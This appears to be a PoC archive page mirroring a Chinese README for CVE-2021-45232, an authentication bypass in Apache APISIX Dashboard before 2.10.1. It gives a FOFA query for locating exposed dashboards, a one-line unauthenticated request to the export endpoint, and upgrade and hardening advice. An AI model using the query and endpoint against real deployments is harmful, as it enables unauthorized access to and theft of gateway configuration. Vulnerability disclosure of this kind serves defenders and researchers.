Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2021-45232 PoC — security vulnerability on unauthorized access.

Source
Associated Vulnerability
Title:security vulnerability on unauthorized access. (CVE-2021-45232)
Description:In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
Readme
# Apache APISIX Dashboard未授权访问漏洞(CVE-2021-45232)

## FOFA 查询

title="Apache APISIX Dashboard"

## 影响范围

Apache APISIX Dashboard < 2.10.1

## POC:


```IP:PORT/apisix/admin/migrate/export
IP:PORT/apisix/admin/migrate/export
```

![image](https://github.com/pingpongcult/CVE-2021-4523/blob/main/CVE-2021-45232.png)

## 修复建议
- 升级至最新安全版本 Apache APISIX Dashboard 2.10.1:https://github.com/apache/apisix-dashboard/releases/tag/v2.10.1

- 修改默认用户名和密码,并配置访问 Apache APISIX Dashboard的白名单。


## 参考链接

https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
File Snapshot

[4.0K] /data/pocs/b466cca3825f2eb25195dab8f2dd73d6a6cf9a08 ├── [136K] CVE-2021-45232.png └── [ 664] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →